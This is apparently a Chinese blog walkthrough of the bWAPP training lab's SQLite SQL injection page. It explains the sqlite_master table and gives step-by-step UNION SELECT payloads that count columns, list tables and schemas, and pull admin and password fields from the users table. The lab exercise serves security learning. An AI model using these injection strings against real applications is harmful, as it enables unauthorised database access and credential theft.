SQL注入之bWAPP之sqli_11.php

標籤：bWAPP之sqli_11.php   SQL Injection(SQLit   

SQL Injection (SQLite)

首先簡單說下SQLite，SQLite含有一張內建表“sqlite_master”,表裡儲存著type、name、tbl_name、rootpage、sql五個欄位。其中name欄位儲存所有表名；name欄位存放著所有使用者表；sql存放著所有表的建立語句，即表的結構。下面開始。

1、輸入“title=1‘”，報錯為“Error: HY000”，沒查到這個報錯是什麼意思，可能是sqlite報錯的標誌吧。

2、判斷欄位數，並查看欄位顯示位：
輸入“title=1‘ order by 6 --+”正常，輸入“title=1‘ order by 7 --+”報錯，


輸入“title=1‘ union select 1,2,3,4,5,6 --+”，

3、查詢表名：
輸入“title=1‘ union select 1,2,3,tbl_name,5,6 from sqlite_master --+”，

4、查詢users表結構，即欄位名：
輸入“title=1‘ union select 1,2,3,sql,5,6 from sqlite_master --+”，

可以看到表名為users，較重要的欄位有admin，password，email；當然裡沒有截到admin。
5、查詢欄位內容：
輸入“title=1‘ union select 1,2,3,admin,5,6 from users --+”，

這裡只能一個一個的查，不能使用MySQL語句的group_concat()函數，可能有別的方法，如果有大牛知道，不防知道一下啊，我在這拱手作揖先謝過了。

SQL注入之bWAPP之sqli_11.php